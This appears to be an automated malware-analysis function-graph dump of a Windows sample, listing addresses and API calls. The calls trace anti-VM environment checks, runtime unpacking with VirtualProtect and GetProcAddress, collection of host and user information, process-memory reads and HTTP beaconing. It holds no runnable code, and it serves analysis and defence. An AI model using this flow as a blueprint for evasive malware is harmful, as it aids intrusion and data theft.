11853->11854 11855 153635 11854->11855 11855->11673 11857 153cc0 task 39 API calls 11856->11857 11858 153658 11857->11858 11858->11677 11860 153cc0 task 39 API calls 11859->11860 11861 152a8f 11860->11861 11862 152aa0 11861->11862 11863 153ce0 41 API calls 11862->11863 11864 152adf 11863->11864 11865 153ce0 41 API calls 11864->11865 11866 152af3 11865->11866 11867 153ce0 41 API calls 11866->11867 11870 152b04 11867->11870 11868 153cc0 task 39 API calls 11869 152b49 11868->11869 11871 153cc0 task 39 API calls 11869->11871 11870->11868 11872 152b55 11871->11872 11873 153cc0 task 39 API calls 11872->11873 11874 152b64 11873->11874 11875 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 11874->11875 11876 152b7c 11875->11876 11877 152b80 11876->11877 11878 153ce0 41 API calls 11877->11878 11879 152bc2 11878->11879 11880 153ce0 41 API calls 11879->11880 11881 152bd6 11880->11881 11882 153ce0 41 API calls 11881->11882 11883 152c11 11882->11883 11884 153ce0 41 API calls 11883->11884 11885 152c2e 11884->11885 11886 153cc0 task 39 API calls 11885->11886 11887 152c4f 11886->11887 11888 153cc0 task 39 API calls 11887->11888 11890 152c5e 11888->11890 11889 153cc0 task 39 API calls 11891 152c9b 11889->11891 11890->11889 11892 153cc0 task 39 API calls 11891->11892 11893 152caa 11892->11893 11894 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 11893->11894 11895 152cc2 11894->11895 11896 152cd0 11895->11896 11897 153ce0 41 API calls 11896->11897 11898 152ced 11897->11898 11898->11687 11900 153ce0 41 API calls 11899->11900 11901 152d3f 11900->11901 11902 153cc0 task 39 API calls 11901->11902 11903 152d90 11902->11903 11904 153cc0 task 39 API calls 11903->11904 11905 152d9c 11904->11905 11906 153cc0 task 39 API calls 11905->11906 11907 152da8 11906->11907 11908 153cc0 task 39 API calls 11907->11908 11909 152db7 11908->11909 11910 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 11909->11910 11911 152dd0 11910->11911 11911->11697 11913 152e0b 11912->11913 11914 153cc0 task 39 API calls 11913->11914 11915 152e81 11914->11915 11916 153cc0 task 39 API calls 11915->11916 11917 152e89 11916->11917 11918 152ea0 11917->11918 11919 153ce0 41 API calls 11918->11919 11920 152edf 11919->11920 11921 153ce0 41 API calls 11920->11921 11922 152f4d 11921->11922 11923 153ce0 41 API calls 11922->11923 11924 152f6a 11923->11924 11925 153cc0 task 39 API calls 11924->11925 11926 152f8b 11925->11926 11927 153cc0 task 39 API calls 11926->11927 11929 152f9a 11927->11929 11928 153ce0 41 API calls 11930 152fce 11928->11930 11929->11928 11931 153ce0 41 API calls 11930->11931 11932 152feb 11931->11932 11933 153cc0 task 39 API calls 11932->11933 11934 15300c 11933->11934 11935 153cc0 task 39 API calls 11934->11935 11938 15301b 11935->11938 11936 153cc0 task 39 API calls 11937 15307b 11936->11937 11939 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 11937->11939 11938->11936 11940 153093 11939->11940 11940->11705 11942 153ce0 41 API calls 11941->11942 11943 151c1c 11942->11943 11944 153ce0 41 API calls 11943->11944 11945 151c66 11944->11945 11946 153ce0 41 API calls 11945->11946 11947 151c7a 11946->11947 11948 153ce0 41 API calls 11947->11948 11949 151c97 11948->11949 11950 153cc0 task 39 API calls 11949->11950 11951 151cb8 11950->11951 11952 153cc0 task 39 API calls 11951->11952 11954 151cc7 11952->11954 11953 153cc0 task 39 API calls 11955 151d8b 11953->11955 11954->11953 11956 153cc0 task 39 API calls 11955->11956 11957 151d97 11956->11957 11958 153cc0 task 39 API calls 11957->11958 11959 151da3 11958->11959 11960 153cc0 task 39 API calls 11959->11960 11961 151db2 11960->11961 11962 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 11961->11962 11963 151dc7 11962->11963 11963->11711 11965 153ce0 41 API calls 11964->11965 11966 151e26 11965->11966 11967 153ce0 41 API calls 11966->11967 11968 151e3a 11967->11968 11969 153ce0 41 API calls 11968->11969 11970 151e57 11969->11970 11971 153cc0 task 39 API calls 11970->11971 11972 151e78 11971->11972 11973 153cc0 task 39 API calls 11972->11973 11974 151e87 11973->11974 11975 153ce0 41 API calls 11974->11975 11976 151efb 11975->11976 11977 153ce0 41 API calls 11976->11977 11978 151f18 11977->11978 11979 153cc0 task 39 API calls 11978->11979 11980 151f39 11979->11980 11981 153cc0 task 39 API calls 11980->11981 11984 151f48 11981->11984 11982 153cc0 task 39 API calls 11983 151f9f 11982->11983 11985 153cc0 task 39 API calls 11983->11985 11984->11982 11986 151fab 11985->11986 11987 153cc0 task 39 API calls 11986->11987 11988 151fba 11987->11988 11989 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 11988->11989 11990 151fd2 11989->11990 11991 151fe0 11990->11991 11992 153ce0 41 API calls 11991->11992 11993 15201b 11992->11993 11994 153ce0 41 API calls 11993->11994 11995 152032 11994->11995 11996 153ce0 41 API calls 11995->11996 11997 15204c 11996->11997 11998 153cc0 task 39 API calls 11997->11998 11999 15206a 11998->11999 12000 153cc0 task 39 API calls 11999->12000 12003 152079 12000->12003 12001 153ce0 41 API calls 12002 1520ad 12001->12002 12004 153ce0 41 API calls 12002->12004 12003->12001 12005 1520ca 12004->12005 12006 153cc0 task 39 API calls 12005->12006 12007 1520eb 12006->12007 12008 153cc0 task 39 API calls 12007->12008 12011 1520fa 12008->12011 12009 153ce0 41 API calls 12010 15212e 12009->12010 12012 153ce0 41 API calls 12010->12012 12011->12009 12013 15214b 12012->12013 12014 153cc0 task 39 API calls 12013->12014 12015 15216c 12014->12015 12016 153cc0 task 39 API calls 12015->12016 12019 15217b 12016->12019 12017 153cc0 task 39 API calls 12018 1521ae 12017->12018 12020 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 12018->12020 12019->12017 12021 1521c3 12020->12021 12022 1521d0 12021->12022 12023 153ce0 41 API calls 12022->12023 12024 152220 12023->12024 12025 153ce0 41 API calls 12024->12025 12026 152260 12025->12026 12027 153ce0 41 API calls 12026->12027 12028 152274 12027->12028 12029 153ce0 41 API calls 12028->12029 12030 152291 12029->12030 12031 153cc0 task 39 API calls 12030->12031 12032 1522b2 12031->12032 12033 153cc0 task 39 API calls 12032->12033 12035 1522c1 12033->12035 12034 153ce0 41 API calls 12036 1522f5 12034->12036 12035->12034 12037 153ce0 41 API calls 12036->12037 12038 152312 12037->12038 12039 153cc0 task 39 API calls 12038->12039 12040 152333 12039->12040 12041 153cc0 task 39 API calls 12040->12041 12044 152342 12041->12044 12042 153cc0 task 39 API calls 12043 1523c3 12042->12043 12045 153cc0 task 39 API calls 12043->12045 12044->12042 12046 1523d2 12045->12046 12047 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 12046->12047 12048 1523ea 12047->12048 12049 1523f0 12048->12049 12050 153ce0 41 API calls 12049->12050 12051 152438 12050->12051 12052 153ce0 41 API calls 12051->12052 12053 15245c 12052->12053 12054 153ce0 41 API calls 12053->12054 12055 15247a 12054->12055 12056 153ce0 41 API calls 12055->12056 12057 15248b 12056->12057 12058 153ce0 41 API calls 12057->12058 12060 15249c 12058->12060 12059 153ce0 41 API calls 12061 1524dc 12059->12061 12060->12059 12062 153ce0 41 API calls 12061->12062 12063 152502 12062->12063 12064 153cc0 task 39 API calls 12063->12064 12065 15252f 12064->12065 12066 153cc0 task 39 API calls 12065->12066 12068 15253e 12066->12068 12067 153ce0 41 API calls 12069 152581 12067->12069 12068->12067 12070 153ce0 41 API calls 12069->12070 12071 1525a7 12070->12071 12072 153cc0 task 39 API calls 12071->12072 12073 1525d4 12072->12073 12074 153cc0 task 39 API calls 12073->12074 12076 1525e3 12074->12076 12075 153ce0 41 API calls 12077 152626 12075->12077 12076->12075 12078 153ce0 41 API calls 12077->12078 12079 15264c 12078->12079 12080 153cc0 task 39 API calls 12079->12080 12081 152679 12080->12081 12082 153cc0 task 39 API calls 12081->12082 12084 152688 12082->12084 12083 153ce0 41 API calls 12085 1526cb 12083->12085 12084->12083 12086 153ce0 41 API calls 12085->12086 12087 1526f1 12086->12087 12088 153cc0 task 39 API calls 12087->12088 12089 15271e 12088->12089 12090 153cc0 task 39 API calls 12089->12090 12092 15272d 12090->12092 12091 153ce0 41 API calls 12093 15276d 12091->12093 12092->12091 12094 153cc0 task 39 API calls 12093->12094 12095 152788 12094->12095 12096 153cc0 task 39 API calls 12095->12096 12097 152794 12096->12097 12098 153cc0 task 39 API calls 12097->12098 12099 1527a3 12098->12099 12100 153cc0 task 39 API calls 12099->12100 12101 1527af 12100->12101 12102 153cc0 task 39 API calls 12101->12102 12103 1527be 12102->12103 12104 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 12103->12104 12105 1527d6 12104->12105 12105->11723 12107 153cc0 task 39 API calls 12106->12107 12108 15280a 12107->12108 12108->11729 12111 152886 12109->12111 12110 153ce0 41 API calls 12112 152914 12110->12112 12111->12110 12113 153cc0 task 39 API calls 12112->12113 12114 152929 12113->12114 12115 153cc0 task 39 API calls 12114->12115 12116 152938 12115->12116 12116->11735 12118 153ce0 41 API calls 12117->12118 12119 152988 12118->12119 12120 153ce0 41 API calls 12119->12120 12121 1529b0 12120->12121 12122 153ce0 41 API calls 12121->12122 12124 1529c1 12122->12124 12123 153cc0 task 39 API calls 12125 152a3b 12123->12125 12124->12123 12126 153cc0 task 39 API calls 12125->12126 12127 152a47 12126->12127 12128 153cc0 task 39 API calls 12127->12128 12129 152a56 12128->12129 12130 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 12129->12130 12131 152a6e LPtoDP 12130->12131 12131->11542 12131->11543 12145 154300 12132->12145 12136 1540bb task 12137 154300 5 API calls 12136->12137 12144 1540e3 task 12136->12144 12138 154136 12137->12138 12152 154250 12138->12152 12142 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 12143 1536ad 12142->12143 12143->11653 12144->12142 12146 15431b _Min_value task _Max_value 12145->12146 12147 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 12146->12147 12148 1540b1 12147->12148 12148->12136 12149 151bb0 12148->12149 12159 1546e4 12149->12159 12154 154271 _Max_value 12152->12154 12153 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 12155 154142 12153->12155 12154->12153 12156 154410 12155->12156 12202 154500 12156->12202 12164 15466c 12159->12164 12163 154703 12170 15461c 12164->12170 12167 1558f4 12168 15590e 12167->12168 12169 15593b RaiseException 12167->12169 12168->12169 12169->12163 12173 1556b4 12170->12173 12174 154648 12173->12174 12175 1556c1 12173->12175 12174->12167 12175->12174 12181 157928 12175->12181 12178 1556ee 12199 1575a0 12178->12199 12183 1593a5 12181->12183 12182 1593e3 12185 15964a ___std_exception_copy 14 API calls 12182->12185 12183->12182 12184 1593ce HeapAlloc 12183->12184 12188 1593b7 _unexpected 12183->12188 12186 1593e1 12184->12186 12184->12188 12187 1556de 12185->12187 12186->12187 12187->12178 12190 158bc3 12187->12190 12188->12182 12188->12184 12189 15795d _Allocate EnterCriticalSection LeaveCriticalSection 12188->12189 12189->12188 12191 158bd1 12190->12191 12192 158bdf 12190->12192 12191->12192 12196 158bf7 12191->12196 12193 15964a ___std_exception_copy 14 API calls 12192->12193 12198 158be7 12193->12198 12194 1578c7 ___std_exception_copy 39 API calls 12195 158bf1 12194->12195 12195->12178 12196->12195 12197 15964a ___std_exception_copy 14 API calls 12196->12197 12197->12198 12198->12194 12200 158d42 ___free_lconv_mon 14 API calls 12199->12200 12201 1575b8 12200->12201 12201->12174 12205 154520 12202->12205 12206 154530 allocator 12205->12206 12209 154550 12206->12209 12210 15455c 12209->12210 12211 15456a 12209->12211 12215 1545a0 12210->12215 12212 15442e 12211->12212 12223 151b00 12211->12223 12212->12144 12216 1545b7 12215->12216 12217 1545bc 12215->12217 12226 151a80 12216->12226 12219 151b00 _Allocate 16 API calls 12217->12219 12222 1545c5 12219->12222 12221 1545e0 12221->12212 12222->12221 12230 1578d7 12222->12230 12235 154712 12223->12235 12227 151a8e stdext::threads::lock_error::lock_error 12226->12227 12228 1558f4 std::_Xinvalid_argument RaiseException 12227->12228 12229 151a9c 12228->12229 12229->12217 12231 157813 ___std_exception_copy 39 API calls 12230->12231 12232 1578e6 12231->12232 12233 1578f4 _Allocate 11 API calls 12232->12233 12234 1578f3 12233->12234 12237 154717 12235->12237 12236 157928 ___std_exception_copy 15 API calls 12236->12237 12237->12236 12238 151b0c 12237->12238 12239 15795d _Allocate EnterCriticalSection LeaveCriticalSection 12237->12239 12241 154733 _Allocate 12237->12241 12238->12212 12239->12237 12240 154afc stdext::threads::lock_error::lock_error 12242 1558f4 std::_Xinvalid_argument RaiseException 12240->12242 12241->12240 12244 1558f4 std::_Xinvalid_argument RaiseException 12241->12244 12243 154b19 12242->12243 12244->12240 12246 153dd7 task 12245->12246 12247 153e07 task 12246->12247 12249 153ee0 12246->12249 12247->11823 12252 153fe0 12249->12252 12255 1541f0 12252->12255 12254 153f15 12254->12247 12256 154228 _MallocaArrayHolder 12255->12256 12257 15421b 12255->12257 12256->12254 12259 151b20 12257->12259 12260 151b5e 12259->12260 12261 1578d7 _Allocate 39 API calls 12260->12261 12262 151b79 12260->12262 12261->12260 12262->12256 12264 151132 12263->12264 12265 15115a GetModuleHandleW 12264->12265 12266 15117f 12265->12266 12267 157928 ___std_exception_copy 15 API calls 12266->12267 12268 1511ad __InternalCxxFrameHandler 12266->12268 12267->12268 12268->11741 12277 151359 __InternalCxxFrameHandler 12269->12277 12278 151352 12269->12278 12270 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 12271 1516b0 GetPEB 12270->12271 12282 10991d0 12271->12282 12272 1514ef 12273 151508 VirtualProtect 12272->12273 12274 15152a 12273->12274 12276 151573 VirtualFree 12274->12276 12274->12278 12280 151593 VirtualProtect 12274->12280 12275 15142f GetModuleHandleA GetProcAddress LoadLibraryA 12275->12277 12276->12274 12277->12272 12277->12275 12279 1514d5 GetProcAddress 12277->12279 12278->12270 12279->12277 12280->12278 12297 10989b0 12282->12297 12284 10991db 12285 10991df ExitProcess 12284->12285 12286 10991e7 12284->12286 12380 10986d0 InitializeCriticalSection 12286->12380 12288 10991ec 12390 10972c0 12288->12390 12296 1099200 12296->12296 12298 10989bd 12297->12298 12299 10989d2 EnumDisplayDevicesW 12298->12299 12300 10989fa 12299->12300 12301 1098a54 GetModuleHandleA GetProcAddress GetProcAddress 12299->12301 12302 1098a00 StrStrIW 12300->12302 12303 1098a8c ExpandEnvironmentStringsW ExpandEnvironmentStringsW GetFileAttributesW 12301->12303 12304 1098a86 12301->12304 12307 10991b9 12302->12307 12308 1098a17 StrStrIW 12302->12308 12305 1098aed 12303->12305 12306 1098acc 12303->12306 12304->12303 12310 1098af6 SHGetFolderPathW SHGetFolderPathW PathCombineW GetFileAttributesW 12305->12310 12306->12305 12309 1098ad0 GetFileAttributesW 12306->12309 12307->12284 12308->12307 12311 1098a2d StrStrIW 12308->12311 12309->12305 12312 1098ade 12309->12312 12315 1098b45 12310->12315 12311->12307 12313 1098a43 EnumDisplayDevicesW 12311->12313 12312->12305 12312->12310 12313->12301 12313->12302 12314 1098b80 PathCombineW GetFileAttributesW 12314->12315 12315->12307 12315->12314 12316 1098bc4 12315->12316 12316->12307 12317 1098bcd PathCombineW PathCombineW GetFileAttributesW 12316->12317 12318 1098d8b PathCombineW GetFileAttributesW 12317->12318 12319 1098c15 12317->12319 12321 1098e67 ExpandEnvironmentStringsW GetFileAttributesW 12318->12321 12322 1098db6 12318->12322 12319->12318 12320 1098c1d GetFileAttributesW 12319->12320 12320->12318 12325 1098c2f 12320->12325 12323 1098e8c 12321->12323 12324 1098eb1 GetComputerNameW GetUserNameW KiUserCallbackDispatcher GetSystemMetrics 12321->12324 12322->12321 12326 1098dbe CreateFileW 12322->12326 12323->12324 12327 1098e90 GetFileAttributesExW 12323->12327 12329 1098f30 lstrcmpW 12324->12329 12325->12318 12328 1098c37 CreateFileW 12325->12328 12330 1098deb GetFileSize GetProcessHeap HeapAlloc 12326->12330 12331 1098e2a 12326->12331 12327->12324 12334 1098ea7 12327->12334 12335 1098c6b GetFileSize GetProcessHeap HeapAlloc 12328->12335 12336 1098caa CreateFileW 12328->12336 12329->12307 12337 1098f48 12329->12337 12338 1098e0c ReadFile 12330->12338 12339 1098e23 CloseHandle 12330->12339 12332 1098e4b 12331->12332 12333 1098e32 lstrcmpA 12331->12333 12340 1098e5f 12332->12340 12341 1098e4f GetProcessHeap HeapFree 12332->12341 12333->12332 12334->12307 12334->12324 12342 1098c8c ReadFile 12335->12342 12343 1098ca3 CloseHandle 12335->12343 12345 1098cd1 GetFileSize GetProcessHeap HeapAlloc 12336->12345 12346 1098d14 12336->12346 12337->12329 12344 1098f4f StrStrW 12337->12344 12338->12339 12339->12331 12340->12307 12340->12321 12341->12340 12342->12343 12343->12336 12344->12307 12348 1098f69 lstrcmpW 12344->12348 12349 1098d0b CloseHandle 12345->12349 12350 1098cf2 ReadFile 12345->12350 12347 1098d53 12346->12347 12351 1098d24 lstrcmpA 12346->12351 12352 1098d6b 12347->12352 12353 1098d57 GetProcessHeap HeapFree 12347->12353 12354 1098f7b lstrcmpW 12348->12354 12355 1098f8e 12348->12355 12349->12346 12350->12349 12351->12347 12357 1098d34 lstrcmpA 12351->12357 12358 1098d81 12352->12358 12359 1098d75 GetProcessHeap HeapFree 12352->12359 12353->12352 12354->12307 12354->12355 12356 1098fa5 lstrcmpW 12355->12356 12360 1098fc1 GlobalMemoryStatusEx 12355->12360 12356->12307 12356->12355 12357->12347 12358->12307 12358->12318 12359->12358 12360->12307 12361 1098ff4 lstrcmpW 12360->12361 12362 1099015 12361->12362 12363 1099006 lstrcmpW 12361->12363 12362->12307 12364 1099064 PathCombineW 12362->12364 12367 109903a lstrcmpW 12362->12367 12363->12362 12365 1099080 12364->12365 12365->12365 12366 1099090 FindFirstFileW 12365->12366 12368 10990b0 12366->12368 12369 1099187 GetModuleFileNameW StrStrIW 12366->12369 12367->12364 12370 109904c 12367->12370 12371 10990b4 lstrcmpW 12368->12371 12369->12284 12370->12307 12370->12364 12372 10990ca lstrcmpW 12371->12372 12373 1099165 FindNextFileW 12371->12373 12372->12373 12378 10990e0 12372->12378 12373->12371 12374 109917b FindClose 12373->12374 12374->12307 12374->12369 12375 109910b lstrcmpW 12376 109911f lstrcmpW 12375->12376 12375->12378 12377 109912b lstrcmpW 12376->12377 12376->12378 12377->12378 12379 1099137 lstrcmpW 12377->12379 12378->12373 12378->12375 12379->12378 12381 1098703 GetVolumeInformationW StringFromGUID2 wsprintfA CreateMutexW GetLastError 12380->12381 12458 1097180 12380->12458 12383 10987bf 12381->12383 12384 10988b1 ExitProcess 12381->12384 12466 1092690 GetTickCount 12383->12466 12386 10987c4 WSAStartup CryptAcquireContextA 12387 109880f CryptAcquireContextA 12386->12387 12389 109882f CoInitializeEx ExpandEnvironmentStringsW CreateFileW 12386->12389 12387->12384 12387->12389 12389->12288 12468 1099650 12390->12468 12393 109730c ExpandEnvironmentStringsW 12394 109731f GetSystemWow64DirectoryW 12393->12394 12395 109733b wnsprintfW ExpandEnvironmentStringsW wnsprintfW 12394->12395 12396 1097335 GetLastError 12394->12396 12470 1096d30 VariantInit CoCreateInstance 12395->12470 12396->12395 12399 10973f9 NetApiBufferFree 12400 10974d1 12399->12400 12401 109740f 12399->12401 12408 10992b0 CryptGenRandom 12400->12408 12506 10993b0 8 API calls 12401->12506 12404 109743c wsprintfW CoGetObject 12405 1097493 12404->12405 12405->12400 12407 10974cb CoUninitialize 12405->12407 12407->12400 12409 10992ec 12408->12409 12521 1092830 GetProcessHeap HeapAlloc 12409->12521 12412 109932e 12414 1092830 2 API calls 12412->12414 12413 1099322 GetProcessHeap HeapFree 12413->12412 12415 109933d 12414->12415 12416 10991f6 12415->12416 12417 1099346 wsprintfA 12415->12417 12421 1097900 GetPEB LsaOpenPolicy 12416->12421 12418 1099371 12417->12418 12420 109938f GetProcessHeap HeapFree GetProcessHeap HeapFree 12418->12420 12523 1096810 ObtainUserAgentString MultiByteToWideChar 12418->12523 12420->12416 12422 10979ca GetComputerNameW GetUserNameW WideCharToMultiByte 12421->12422 12423 109794c LsaQueryInformationPolicy 12421->12423 12424 1097a1b 12422->12424 12425 1097a24 GetProcessHeap HeapAlloc 12422->12425 12426 109795f 12423->12426 12427 10979c1 LsaClose 12423->12427 12428 1097a5f WideCharToMultiByte 12424->12428 12425->12424 12429 1097a3a WideCharToMultiByte 12425->12429 12430 10979ba LsaFreeMemory 12426->12430 12431 1097967 GetProcessHeap HeapAlloc 12426->12431 12427->12422 12432 1097a89 GetProcessHeap HeapAlloc 12428->12432 12436 1097a80 12428->12436 12429->12428 12430->12427 12434 1097980 12431->12434 12433 1097a9d WideCharToMultiByte 12432->12433 12432->12436 12433->12436 12434->12430 12434->12434 12435 1092690 GetTickCount 12435->12436 12436->12435 12437 1097b0a 12436->12437 12438 1097b19 wsprintfA wsprintfA 12437->12438 12439 1097b6e 12438->12439 12440 1096810 32 API calls 12439->12440 12441 1097ba4 12440->12441 12442 1097bbf 12441->12442 12443 1097bb7 GetProcessHeap HeapFree 12441->12443 12444 1097bce 12442->12444 12445 1097bc6 GetProcessHeap HeapFree 12442->12445 12443->12442 12446 1097bdd 12444->12446 12447 1097bd5 GetProcessHeap HeapFree 12444->12447 12445->12444 12448 1097be9 12446->12448 12449 1097be1 GetProcessHeap HeapFree 12446->12449 12447->12446 12450 10988c0 ExpandEnvironmentStringsW ExpandEnvironmentStringsW ExpandEnvironmentStringsW 12448->12450 12449->12448 12451 1098910 12450->12451 12451->12451 12452 1098920 GetFileAttributesW 12451->12452 12453 109893f GetFileAttributesW 12452->12453 12454 1098934 12452->12454 12455 1098938 12453->12455 12456 1098963 wnsprintfW ShellExecuteW 12453->12456 12454->12453 12454->12455 12455->12456 12457 1098956 lstrcpyW 12455->12457 12456->12296 12457->12456 12459 1097191 RegOpenKeyExW 12458->12459 12460 109720f 12459->12460 12461 10971b4 RegQueryValueExW 12459->12461 12460->12459 12465 1097226 12460->12465 12462 10971d0 GetProcessHeap HeapAlloc 12461->12462 12463 1097206 RegCloseKey 12461->12463 12462->12463 12464 10971ec RegQueryValueExW 12462->12464 12463->12460 12464->12463 12465->12381 12467 10926a0 12466->12467 12467->12386 12467->12467 12469 10972cd ExpandEnvironmentStringsW ExpandEnvironmentStringsW lstrlenW 12468->12469 12469->12393 12469->12394 12471 1096d8b 12470->12471 12477 1096dda 12470->12477 12472 1096dbc SysAllocString 12471->12472 12471->12477 12472->12477 12473 1096dfd SysFreeString 12474 1096e00 12473->12474 12475 1097148 SetFileAttributesW lstrcpyW GetUserNameW NetUserGetInfo 12474->12475 12476 1096e0a SysAllocString 12474->12476 12475->12399 12475->12400 12478 1096e2d SysFreeString 12476->12478 12477->12473 12477->12474 12479 1096e5d 12478->12479 12480 1096e3d SysAllocString 12478->12480 12481 1096e61 SysAllocString 12479->12481 12484 1096e79 12479->12484 12482 1096e54 SysFreeString 12480->12482 12483 1096e76 SysFreeString 12481->12483 12482->12479 12483->12484 12484->12475 12485 1096eaf SysAllocString 12484->12485 12488 1096ee7 12484->12488 12486 1096ec2 SysFreeString SysAllocString 12485->12486 12487 1096ed8 SysFreeString 12486->12487 12487->12488 12489 1096f4b 12488->12489 12490 1096f29 SysAllocString 12488->12490 12493 1096faa SysAllocString 12489->12493 12494 109700d 12489->12494 12492 1096f3c SysFreeString 12490->12492 12491 10970ad 12491->12475 12495 10970d6 VariantInit SysAllocString SysAllocString 12491->12495 12492->12489 12496 1096fbd SysFreeString SysAllocString 12493->12496 12494->12491 12499 109707e SysAllocString 12494->12499 12497 1097138 SysFreeString VariantClear 12495->12497 12498 1096fd3 SysFreeString 12496->12498 12497->12475 12500 1096fea 12498->12500 12502 1097091 SysFreeString 12499->12502 12500->12494 12501 1096fee SysAllocString 12500->12501 12504 1097001 SysFreeString 12501->12504 12502->12491 12503 109709b SysAllocString 12502->12503 12505 10970aa SysFreeString 12503->12505 12504->12494 12505->12491 12507 1097414 CoInitializeEx lstrlenW 12506->12507 12508 109941d 12506->12508 12507->12404 12507->12405 12508->12507 12509 1099439 GetCurrentProcessId OpenProcess 12508->12509 12509->12507 12510 1099458 ReadProcessMemory 12509->12510 12510->12507 12512 1099482 ReadProcessMemory 12510->12512 12512->12507 12513 109949c GetWindowsDirectoryW StrNCatW VirtualAlloc lstrcpyW 12512->12513 12514 10994f3 GetModuleFileNameW 12513->12514 12516 1099540 ReadProcessMemory 12514->12516 12516->12507 12517 1099557 ReadProcessMemory 12516->12517 12517->12507 12518 1099572 12517->12518 12518->12516 12519 1099589 CloseHandle StrCmpIW 12518->12519 12519->12507 12522 109286c 12521->12522 12522->12412 12522->12413 12524 109685a 12523->12524 12525 1096861 GetProcessHeap HeapAlloc 12523->12525 12552 1096650 12524->12552 12525->12524 12526 109687f MultiByteToWideChar 12525->12526 12526->12524 12528 10968a7 InternetOpenW 12538 10968a5 12528->12538 12529 1096a57 12531 1096a6a GetProcessHeap HeapFree 12529->12531 12532 1096a72 12529->12532 12530 10968f0 InternetSetOptionW 12530->12530 12533 1096907 InternetConnectW 12530->12533 12531->12532 12534 1096a79 GetProcessHeap HeapFree 12532->12534 12535 1096a81 12532->12535 12536 1096a39 InternetCloseHandle 12533->12536 12537 109692b HttpOpenRequestW 12533->12537 12534->12535 12539 1096a88 GetProcessHeap HeapFree 12535->12539 12540 1096a90 12535->12540 12536->12529 12536->12538 12541 1096a2d 12537->12541 12542 1096961 InternetQueryOptionW 12537->12542 12538->12528 12538->12529 12538->12530 12539->12540 12540->12418 12545 1096a33 InternetCloseHandle 12541->12545 12543 109699a HttpSendRequestW 12542->12543 12544 1096984 InternetSetOptionW 12542->12544 12546 1096a22 InternetCloseHandle 12543->12546 12550 10969b2 12543->12550 12544->12543 12545->12536 12546->12545 12547 10969b4 InternetQueryDataAvailable 12547->12550 12548 10969e9 GetProcessHeap HeapReAlloc 12551 10969f9 InternetReadFile 12548->12551 12549 10969d8 GetProcessHeap HeapAlloc 12549->12551 12550->12546 12550->12547 12550->12548 12550->12549 12551->12550 12553 1096660 InternetCrackUrlW 12552->12553 12555 10966c3 GetProcessHeap HeapAlloc 12553->12555 12558 109675e 12553->12558 12557 10966ec GetProcessHeap HeapAlloc 12555->12557 12555->12558 12557->12558 12558->12538 12559->11764 12561 1590d0 12560->12561 12562 1590d6 12560->12562 12605 15b568 12561->12605 12566 1590da SetLastError 12562->12566 12610 15b5a7 12562->12610 12570 15916f 12566->12570 12571 158b54 12566->12571 12574 158b7f CallUnexpected 37 API calls 12570->12574 12587 158b7f 12571->12587 12572 159120 12577 15b5a7 _unexpected 6 API calls 12572->12577 12573 15910f 12576 15b5a7 _unexpected 6 API calls 12573->12576 12575 159174 12574->12575 12578 15911d 12576->12578 12579 15912c 12577->12579 12622 158d42 12578->12622 12580 159147 12579->12580 12581 159130 12579->12581 12628 158ee8 12580->12628 12582 15b5a7 _unexpected 6 API calls 12581->12582 12582->12578 12586 158d42 ___free_lconv_mon 14 API calls 12586->12566 12829 15b8ff 12587->12829 12590 158b8f 12592 158b99 IsProcessorFeaturePresent 12590->12592 12597 158bb8 12590->12597 12594 158ba5 12592->12594 12593 158498 __CreateFrameInfo 21 API calls 12596 158bc2 12593->12596 12859 1576cb 12594->12859 12598 158bdf 12596->12598 12603 158bf7 12596->12603 12597->12593 12599 15964a ___std_exception_copy 14 API calls 12598->12599 12600 158be7 12599->12600 12865 1578c7 12600->12865 12602 158b7e 12603->12602 12604 15964a ___std_exception_copy 14 API calls 12603->12604 12604->12600 12633 15b425 12605->12633 12607 15b584 12608 15b59f TlsGetValue 12607->12608 12609 15b58d 12607->12609 12609->12562 12611 15b425 _unexpected 5 API calls 12610->12611 12612 15b5c3 12611->12612 12613 15b5e1 TlsSetValue 12612->12613 12614 1590f2 12612->12614 12614->12566 